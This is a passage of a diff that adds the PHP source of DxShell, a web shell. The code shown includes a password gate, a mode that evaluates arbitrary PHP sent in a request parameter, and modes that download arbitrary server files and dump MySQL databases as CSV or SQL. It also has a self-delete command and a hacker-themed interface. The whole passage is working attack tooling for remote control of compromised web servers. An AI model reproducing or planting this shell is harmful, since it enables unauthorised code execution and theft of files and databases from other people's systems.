+	{ /* IMGS are allowed without passwd =) */	$GLOB['SHELL']['USER']['Login']='';
+	$GLOB['SHELL']['USER']['Passw']='';
+	}
+
+if (	isset($_GET['dxinstant'])?$_GET['dxinstant']=='logoff':false   )
+	{
+	if ($DXGLOBALSHIT)
+		{		if (isset($_COOKIE['DxS_AuthC'])) DxSetCookie('DxS_AuthC','---', 1);
+		}
+		else
+		{
+		header('WWW-Authenticate: Basic realm="==== HIT CANCEL OR PRESS ESC ===='.base_convert(crc32(mt_rand(0, time())),10,36).'"');		header('HTTP/1.0 401 Unauthorized');
+		}
+
+	print '<html>Redirecting... press <a href="'.DxURL('kill','').'">here if shit happens</a>';
+	DxGotoURL(DxURL('kill',''), '1noheaders');
+	die();
+	}
+
+if (((strlen($GLOB['SHELL']['USER']['Login'])+strlen($GLOB['SHELL']['USER']['Passw']))>=2))
+	{	if ($DXGLOBALSHIT)
+		{		if (isset($_POST['DxS_Auth']) or isset($_COOKIE['DxS_AuthC']))
+			{			if (!(
+
+				((@$_POST['DxS_Auth']['L']==$GLOB['SHELL']['USER']['Login']) AND /* form */
+				(@$_POST['DxS_Auth']['P']==$GLOB['SHELL']['USER']['Passw']
+							OR
+				(strlen($GLOB['SHELL']['USER']['Passw'])==32 AND @$_POST['DxS_Auth']['P']==md5($GLOB['SHELL']['USER']['Passw']))
+				))
+						OR
+				@$_COOKIE['DxS_AuthC']==md5($GLOB['SHELL']['USER']['Login'].$GLOB['SHELL']['USER']['Passw']) /* cookie */
+
+				))
+				{print(DxError('Fucked off brutally'));unset($_POST['DxS_Auth'], $_COOKIE['DxS_AuthC']);}
+				else DxSetCookie('DxS_AuthC', md5($GLOB['SHELL']['USER']['Login'].$GLOB['SHELL']['USER']['Passw']), time()+60*60*24*2);
+				}
+		if (!isset($_POST['DxS_Auth']) AND !isset($_COOKIE['DxS_AuthC']))
+			{
+			print "\n".'<form action="'.DxURL('kill', '').'" method=POST style="position:absolute;z-index:100;top:0pt;left:40%;width:100%;height:100%;">';
+			print "\n".'<br><input type=text name="DxS_Auth[L]" value="<LOGIN>" 	onfocus="this.value=\'\'"  style="width:200pt">';
+			print "\n".'<br><input type=text name="DxS_Auth[P]" value="<PASSWORD>" 	onfocus="this.value=\'\'"  style="width:200pt">';
+			print "\n".'<br><input type=submit value="Ok" style="width:200pt;"></form>';
+			print "\n".'</form>';
+			die();
+			}
+		}
+		else
+		{
+		if (!isset($_SERVER['PHP_AUTH_USER']))
+			{
+			header('WWW-Authenticate: Basic realm="DxShell '.$GLOB['SHELL']['Ver'].' Auth"');
+			header('HTTP/1.0 401 Unauthorized');
+			/* Result if user hits cancel button */
+			unset($_GET['dxinstant']);
+			die(DxError('Fucked off brutally'));
+			}
+			else
+			if (!(	$_SERVER['PHP_AUTH_USER']==$GLOB['SHELL']['USER']['Login']
+			AND (
+					$_SERVER['PHP_AUTH_PW']==$GLOB['SHELL']['USER']['Passw']
+								OR
+					(strlen($GLOB['SHELL']['USER']['Passw'])==32 AND md5($_SERVER['PHP_AUTH_PW'])==$GLOB['SHELL']['USER']['Passw'])
+					)
+					))
+			{
+			header('WWW-Authenticate: Basic realm="DxS '.$GLOB['SHELL']['Ver'].' Auth: Fucked off brutally"');
+			header('HTTP/1.0 401 Unauthorized');
+			/* Result if user hits cancel button */
+			unset($_GET['dxinstant']);
+			die(DxError('Fucked off brutally'));
+			}
+		}
+	}
+
+###################################################################################
+####################++++++# I N S T A N T    U S A G E #+++++++####################
+###################################################################################
+if (!isset($_GET['dxmode'])) $_GET['dxmode']='DIR'; else $_GET['dxmode']=strtoupper($_GET['dxmode']);
+if ($_GET['dxmode']=='DDOS') /* DDOS mode. In other case, EVALer of everything that comes in $_GET['s_php'] OR $_POST['s_php']  */
+	{
+	$F = $_GET + $_POST;
+	if (!isset($F['s_php'])) die('o_O Tync DDOS Remote Shell '.$GLOB['SHELL']['Ver']."\n".'<br>Use GET or POST to set "s_php" variable with code to be executed =)<br>Enjoy!');
+	eval(stripslashes($F['s_php']));
+	die("\n\n".'<br><br>'.'o_O Tync DDOS Web Shell '.$GLOB['SHELL']['Ver'].((!isset($F['s_php']))?"\n".'<br>'.'$s_php is responsible for php-code-injection':''));
+	}
+if ($_GET['dxmode']=='IMG')
+	{
+	$IMGS=array(
+		'DxS'	=> 'R0lGODlhEAAQAIAAAAD/AAAAACwAAAAAEAAQAAACL4yPGcCs2NqLboGFaXW3X/tx2WcZm0luIcqFKyuVHRSLJOhmGI4mWqQAUoKPYqIAADs=',
+		'folder'=> 'R0lGODlhDwAMAJEAAP7rhriFIP///wAAACH5BAEAAAIALAAAAAAPAAwAAAIklIJhywcPVDMBwpSo3U/WiIVJxG0IWV7Vl4Joe7Jp3HaHKAoFADs=',
+		'foldup'=> 'R0lGODlhDwAMAJEAAP7rhriFIAAAAP///yH5BAEAAAMALAAAAAAPAAwAAAIw3IJiywcgRGgrvCgA2tNh/Dxd8JUcApWgaJFqxGpp+GntFV4ZauV5xPP5JIeTcVIAADs=',
+		'view'	=> 'R0lGODlhEAAJAJEAAP///wAAAP///wAAACH5BAEAAAIALAAAAAAQAAkAAAIglB8Zx6aQYGIRyCpFsFY9jl1ft4Fe2WmoZ1LROzWIIhcAOw==',
+		'del'	=> 'R0lGODlhEAAQAKIAAIoRGNYnOtclPv///////wAAAAAAAAAAACH5BAEAAAQALAAAAAAQABAAAANASArazQ4MGOcLwb6BGQBYBknhR3zhRHYUKmQc65xgKM+0beKn3fErm2bDqomIRaMluENhlrcFaEejPKgL3qmRAAA7',
+		'copy'	=> 'R0lGODlhEAAQAKIAAP//lv///3p6egAAAP///wAAAAAAAAAAACH5BAEAAAQALAAAAAAQABAAAAM+SKrT7isOQGsII7Jq7/sTdWEh53FAgwLjILxp2WGculIurL68XsuonCAG6PFSvxvuuDMOQcCaZuJ8TqGQSAIAOw==',
+		'move'	=> 'R0lGODlhEAAQAJEAADyFFLniPu79wP///yH5BAEAAAMALAAAAAAQABAAAAI3nD8AyAgiVnMihDidldmAnXFfIB6Pomwo9kCu5bqpRdf18qGjTpom6AkBO4lhqHLhCHtEj/JQAAA7',
+		'exec'	=> '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',
+		'rename'=> 'R0lGODlhEAAQAJEAAP///wAAAP///wAAACH5BAEAAAIALAAAAAAQABAAAAIxlI8GC+kCQmgPxVmtpBnurnzgxWUk6GFKQp0eFzXnhdHLRm/SPvPp5IodhC4IS8EoAAA7',
+		'ed'	=> 'R0lGODlhEAAQAKIAAAAzZv////3Tm8DAwJ7R/Gmd0P///wAAACH5BAEAAAYALAAAAAAQABAAAANDaAYM+lABIVqEs4bArtRc0V3MMDAEMWLACRSp6kRNYcfrw9h3mksvHm7G4sF8RF3Q1kgqmZSKZ/HKSKeN6I/VdGIZCQA7',
+		'downl' => 'R0lGODlhEAAQAJEAADyFFIXQLajcOf///yH5BAEAAAMALAAAAAAQABAAAAI6nAepeY0CI3AHREmNvWLmfXkUiH1clz1CUGoLu0JLwtaxzU5WwK89HxABgESgSFM0fpJHx5DWHCkoBQA7',
+		'gzip'	=> 'R0lGODlhEAAQAKIAAARLsHi+//zZWLJ9DvEZAf///wAAAAAAACH5BAEAAAUALAAAAAAQABAAAANCWLrQDkuMKUC4OMAyiB+Pc0GDYJ7nUFgk6qos56KwJs9m3eLSapc83Q0nnBhDjdGCkcFslgrkEwq9UKHS6dLShCQAADs=',
+		);
+	@ob_clean();
+	if ((!isset($_GET['dximg'])) OR (!in_array($_GET['dximg'], array_keys($IMGS)))) $_GET['dximg']='noone';
+	header('Cache-Control: public');
+	header('Expires: '.Date('r', time()+60*60*24*300));
+	header('Content-type: image/gif');
+	print  base64_decode(   (is_array(($IMGS[$_GET['dximg']])))?$IMGS[$_GET['dximg']][1]:$IMGS[$_GET['dximg']]   );
+	die();
+	}
+
+if ($_GET['dxmode']=='F_DWN')
+	{
+	if (!isset($_GET['dxfile'])) 		die(DxError('No file selected. Check $_GET[\'dxfile\'] var'));
+	if (!file_exists($_GET['dxfile']))  die(DxError('No such file'));
+	if (!is_file($_GET['dxfile'])) 		die(DxError('Hey! Find out how to read a directory in notepad, and u can call me "Lame" =) '));
+
+	$DxDOWNLOAD_File=array(); /* prepare struct */
+	$DxDOWNLOAD_File['filename']=basename($_GET['dxfile']);
+	if (isset($_GET['dxparam']))
+		$DxDOWNLOAD_File['headers'][]=('Content-type: text/plain'); /* usual look thru */
+		else
+		{		$DxDOWNLOAD_File['headers'][]=('Content-type: '.mime_content_type($_GET['dxfile']));
+		$DxDOWNLOAD_File['headers'][]=('Content-disposition: attachment; filename="'.basename($_GET['dxfile']).'";');
+		}
+	$DxDOWNLOAD_File['content']=file_get_contents($_GET['dxfile']);
+	}
+
+if ($_GET['dxmode']=='SQL' AND isset($_POST['dxparam']))
+	{/* download query results */	if (!isset($_GET['dxsql_s'],$_GET['dxsql_l'],$_GET['dxsql_p'],$_GET['dxsql_d'],$_POST['dxsql_q']))
+		die(DxError('Not enough params: $_GET[\'dxsql_s\'],$_GET[\'dxsql_l\'],$_GET[\'dxsql_p\'],$_GET[\'dxsql_d\'],$_POST[\'dxsql_q\'] needed'));
+
+	if ((mysql_connect($_GET['dxsql_s'],$_GET['dxsql_l'],$_GET['dxsql_p'])===FALSE) or (mysql_errno()!=0))
+		die(DxError('No connection to mysql server!'."\n".'<br>MySQL:#'.mysql_errno().' - '.mysql_error()));
+	if (!mysql_select_db($_GET['dxsql_d']))
+		die(DxError('Can\'t select database!'."\n".'<br>MySQL:#'.mysql_errno().' - '.mysql_error()));
+
+	/* export as csv */
+	$DxDOWNLOAD_File=array(); /* prepare struct */
+	$DxDOWNLOAD_File['filename']='Query_'.$_GET['dxsql_s'].'_'.$_GET['dxsql_d'].'.csv';
+	$DxDOWNLOAD_File['headers'][]=('Content-type: text/comma-separated-values');
+	$DxDOWNLOAD_File['headers'][]=('Content-disposition: attachment; filename="'.$DxDOWNLOAD_File['filename'].'";');
+	$DxDOWNLOAD_File['content']='';
+
+	$_POST['dxsql_q']=explode(';',$_POST['dxsql_q']);
+
+	for ($q=0;$q<count($_POST['dxsql_q']);$q++)
+		{		if (empty($_POST['dxsql_q'][$q])) continue;
+		$num=DxMySQL_FetchResult(DxMySQLQ($_POST['dxsql_q'][$q], false), $DUMP, false);
+		$DxDOWNLOAD_File['content'].="\n\n".'QUERY: '.str_replace(array("\n",";"), array('',"<-COMMA->"), str_replace("\r",'', $_POST['dxsql_q'][$q] )).";";
+		if ($num<=0) {$DxDOWNLOAD_File['content'].="\n".'Empty;'; continue;}
+		foreach ($DUMP[0] as $key => $val) $DxDOWNLOAD_File['content'].=$key.";"; /* headers */
+		for ($l=0;$l<count($DUMP);$l++)
+			{			$DxDOWNLOAD_File['content'].="\n";
+			$INDEXES=array_keys($DUMP[$l]);
+			for ($i=0; $i<count($INDEXES); $i++)
+				$DxDOWNLOAD_File['content'].=str_replace(array("\n",";"), array('',"<-COMMA->"), str_replace("\r",'', $DUMP[$l][ $INDEXES[$i] ])).";";
+
+			}
+		}
+	}
+
+if ($_GET['dxmode']=='SQLD' AND isset($_POST['dxsql_tables']))
+	{	if (!isset($_GET['dxsql_s'],$_GET['dxsql_l'],$_GET['dxsql_p'],$_GET['dxsql_d'],$_POST['dxsql_tables']))
+		die(DxError('Not enough params: $_GET[\'dxsql_s\'],$_GET[\'dxsql_l\'],$_GET[\'dxsql_p\'],$_GET[\'dxsql_d\'],$_POST[\'dxsql_tables\'] needed'));
+
+	if ((mysql_connect($_GET['dxsql_s'],$_GET['dxsql_l'],$_GET['dxsql_p'])===FALSE) or (mysql_errno()!=0))
+		die(DxError('No connection to mysql server!'."\n".'<br>MySQL:#'.mysql_errno().' - '.mysql_error()));
+	if (!mysql_select_db($_GET['dxsql_d']))
+		die(DxError('Can\'t select database!'."\n".'<br>MySQL:#'.mysql_errno().' - '.mysql_error()));
+
+	if (empty($_POST['dxsql_tables']))  die(DxError('No tables selected...'));
+
+	$DxDOWNLOAD_File=array(); /* prepare struct */
+	$DxDOWNLOAD_File['filename']='Dump_'.$_GET['dxsql_s'].'_'.$_GET['dxsql_d'].'.sql';
+	$DxDOWNLOAD_File['headers'][]=('Content-type: text/plain');
+	$DxDOWNLOAD_File['headers'][]=('Content-disposition: attachment; filename="'.$DxDOWNLOAD_File['filename'].'";');
+	$DxDOWNLOAD_File['content']='';
+
+	$DxDOWNLOAD_File['content'].="\n\t".'/* '.str_repeat('=', 66);
+	$DxDOWNLOAD_File['content'].="\n\t".'==== MySQL Dump '.DxDate(time()).' - DxShell v'.$GLOB['SHELL']['Ver'].' by o_O Tync';
+	$DxDOWNLOAD_File['content'].="\n\t".'==== Server: '.$_GET['dxsql_s'];
+	$DxDOWNLOAD_File['content'].="\n\t".'==== DB: '.$_GET['dxsql_d'];
+	$DxDOWNLOAD_File['content'].="\n\t".'==== Tables: '."\n\t\t\t".implode(', '."\n\t\t\t", $_POST['dxsql_tables']);
+	$DxDOWNLOAD_File['content'].="\n\t".str_repeat('=', 66).' */';
+
+	if (!empty($_POST['dxsql_q']))
+		{		$_POST['dxsql_q']=explode(';', $_POST['dxsql_q']);
+		foreach ($_POST['dxsql_q'] as $CUR)
+			if (empty($CUR)) continue; else DxMySQLQ($CUR, true); /* pre-query */
+		}
+
+	foreach ($_POST['dxsql_tables'] as $CUR_TABLE)
+		{		$DxDOWNLOAD_File['content'].=str_repeat("\n", 5).'/* '.str_repeat('-', 40).' */';
+		DxMySQL_FetchResult(DxMySQLQ('SHOW CREATE TABLE `'.$CUR_TABLE.'`;', false), $DUMP, true);
+		$DxDOWNLOAD_File['content'].="\n".$DUMP[0][1];
+		$DxDOWNLOAD_File['content'].="\n\n";
+		DxMySQL_FetchResult(DxMySQLQ('SELECT * FROM `'.$CUR_TABLE.'`;', false), $DUMP, true);
+		for ($i=0; $i<count($DUMP); $i++)
+			{
+			for ($j=0;$j<count($DUMP[$i]);$j++) $DUMP[$i][$j]=mysql_real_escape_string($DUMP[$i][$j]);
+			$DxDOWNLOAD_File['content'].="\n".'INSERT INTO `'.$CUR_TABLE.'` VALUES ("'.implode('", "', $DUMP[$i]).'");';
+			}
+		}
+	}
+
+if ($_GET['dxmode']=='COOK' AND isset($_POST['dxparam']))
+	{	foreach ($_POST['dxparam'] as $name => $val)
+		{		if ($name=='DXS_NEWCOOK')
+			{
+			if (empty($val['NAM']) or empty($val['VAL'])) continue;			DxSetCookie($val['NAM'], $val['VAL'], time()+60*60*24*10);
+			}
+			else DxSetCookie($name, $val, (empty($val))?1:(time()+60*60*24*10));
+		}
+	DxGotoURL(DxURL('leave', 'dxmode'));
+	die();
+	}
+
+if (isset($_GET['dxinstant']))
+	{	$_GET['dxinstant']=strtoupper($_GET['dxinstant']);
+	if ($_GET['dxinstant']=='DEL')
+		{
+		$ok=@unlink(@substr(@strrchr($_SERVER['PHP_SELF'],"/"),1));
+		print '<script>window.alert("SELF '.(  ($ok)?'deleted. Reload the page to believe me =)':'tried to delete but was unsuccessful'  ).'");</script>';
+		}
+	}
+
+function DxObGZ($s) {return gzencode($s);}
+
+if (isset($DxDOWNLOAD_File))
+	{/* File downloader for everything */
+	if (!$DXGLOBALSHIT)
+		{
+		if ($GLOB['SYS']['GZIP']['CanOutput'])
+			{
+			ini_set('output_buffering',4096);
+			ob_start("DxObGZ");
+			header('Content-Encoding: gzip');
+			}		for ($i=0; $i<count($DxDOWNLOAD_File['headers']); $i++) header($DxDOWNLOAD_File['headers'][$i]);
+		print $DxDOWNLOAD_File['content'];
+		die();
+		}
+	/* if u want to download file when $DXGLOBALSHIT, scroll down */
+	}
+
+###################################################################################
+####################++++++++++++++# M A I N #++++++++++++++++++####################
+###################################################################################
+if (!in_array($_GET['dxmode'], array_keys($GLOB['DxMODES']))) die(DxError('Unknown $_GET[\'dxmode\']! check $GLOB[\'DxMODES\'] array'));
+
+########
+########   Main HAT (blackhat? =))) )
+########
+if (!in_array($_GET['dxmode'], array_keys($GLOB['DxMODES']))) die('Unknown $_GET[\'dxmode\']');
+
+if ($DXGLOBALSHIT)
+	print str_repeat("\n", 20).'<!--SHELL HERE-->';
+?>
+<html><head><title><?=$_SERVER['HTTP_HOST'];?> --= DxShell 1.0 - by o_O Tync =-- :: <?=$GLOB['DxMODES'][$_GET['dxmode']];?></title>
+<Meta Http-equiv="Content-Type" Content="text/html; Charset=windows-1251">
+<link rel="shortcut icon" href="<?=DxURL('kill','dxmode');?>&dxmode=IMG&dximg=DxS">
+<http://leet.phpnet.us/sh.gif>
+<style>
+img	 {border-width:0pt;}
+body, td 		{font-size: 10pt; color: #00B000; background-color: #000000; font-family: Arial;padding:2pt;margin:2pt; vertical-align:top;}
+h1				{font-size: 14pt; color: #00B000; background-color: #002000; font-family: Arial Black; font-weight: bold; text-align: center;}
+h2				{font-size: 12pt; color: #00B000; background-color: #002000; font-family: Courier New; text-align: center;}
+h3				{font-size: 12pt; color: #F0F000; background-color: #002000; font-family: Times New Roman; text-align: center;}
+caption			{font-size: 12pt; color: #00FF00; background-color: #000000; font-family: Times New Roman; text-align:center; border-width: 1pt 3pt 1pt 3pt;border-color:#FFFF00;border-style:solid solid dotted solid;padding: 5pt 0pt;}
+td.h2_oneline	{font-size: 12pt; color: #00B000; font-family: Courier New; text-align: center;background-color: #002000; border-right-color:#00FF00;border-right-width:1pt;border-right-style:solid;vertical-align:middle;}
+td.mode_header	{font-size: 16pt; color: #FFFF00; font-family: Courier New; text-align: center;background-color: #002000; vertical-align:middle;}
+table.outset, td.outset	  {border-width:3pt; border-style:outset; border-color: #004000;margin-top: 2pt;vertical-align:middle;}
+table.bord, td.bord, fieldset   {border-width:1pt; border-style:solid; border-color: #003000;vertical-align:middle;}
+hr   {border-width:1pt; border-style:solid; border-color: #005000; text-align: center; width: 90%;}
+textarea.bout 		{border-color: #000000; border-width:0pt; background: #000000; font: 12px verdana, arial, helvetica, sans-serif; color: #00FF00; Scrollbar-Face-color:#000000;Scrollbar-Track-Color: #000000;}
+td.listing	{background-color: #000500; font-family: Courier New; font-size:8pt; color:#00B000; border-color: #003000;border-width:1pt; border-style:solid; border-collapse:collapse;padding:0pt 3pt;vertical-align:top;}
+td.linelisting  {background-color: #000500; font-family: Courier New; font-size:8pt; color:#00B000; border-color: #003000;border-width:1pt 0pt; border-style:solid; border-collapse:collapse;padding:0pt 3pt;vertical-align:middle;}
+table.linelisting {border-color: #003000;border-width:0pt 1pt; border-style:solid;}
+td.js_floatwin_header {background-color:#003300;font-size:10pt;font-weight:bold;color:#FFFF00;border-color: #00FF00;border-width:1pt; border-style:solid;border-collapse:collapse;}
+td.js_floatwin_body	  {background-color:#000000;font-size:10pt;color:#00B000;border-color: #00FF00;border-width:1pt; border-style:solid;border-collapse:collapse;}
+font.rwx_sticky_bit {color:#FF0000;}
+.highlight_txt		{color: #FFFF00;}
+.achtung			{color: #000000; background-color: #FF0000; font-family: Arial Black; font-size: 14pt; padding:0pt 5pt;}
+
+input 			{font-size: 10pt;font-family: Arial; color: #E0E000; background-color: #000000; border-color:#00FF00 #005000 #005000 #FFFF00; border-width:1pt 1pt 1pt 3pt;border-style:dotted dotted dotted solid; padding-left: 3pt;overflow:hidden;}
+input.radio		{border-width:0pt;color: #FFFF00;}
+input.submit 	{font-size: 12pt;font-family: Impact, Arial Black; color :#00FF00; background-color: #002000; border-color: #00FF00; border-width:0pt 1pt 1pt 0pt; border-style: solid; padding:1pt;letter-spacing:1pt;padding:0pt 2pt;}
+input.bt_Yes 	{font-size: 14pt;font-family: Impact, Arial Black; color :#00FF00; background-color: #005000; border-color: #005000 #005000 #00FF00 #005000; border-width:1pt 1pt 2pt 1pt; border-style: dotted dotted solid dotted; height: 30pt; padding:10pt; margin: 5pt 10pt;}
+input.bt_No 	{font-size: 14pt;font-family: Impact, Arial Black; color :#FF0000; background-color: #500000; border-color: #500000 #500000 #FF0000 #500000; border-width:1pt 1pt 2pt 1pt; border-style: dotted dotted solid dotted; height: 30pt; padding:10pt; margin: 5pt 10pt;}
+input.bt_Yes:Hover 	{color:#000000; background-color:#00FF00;border-bottom-color:#FFFFFF;}
+input.bt_No:Hover 	{color:#000000; background-color:#FF0000;border-bottom-color:#FFFFFF;}
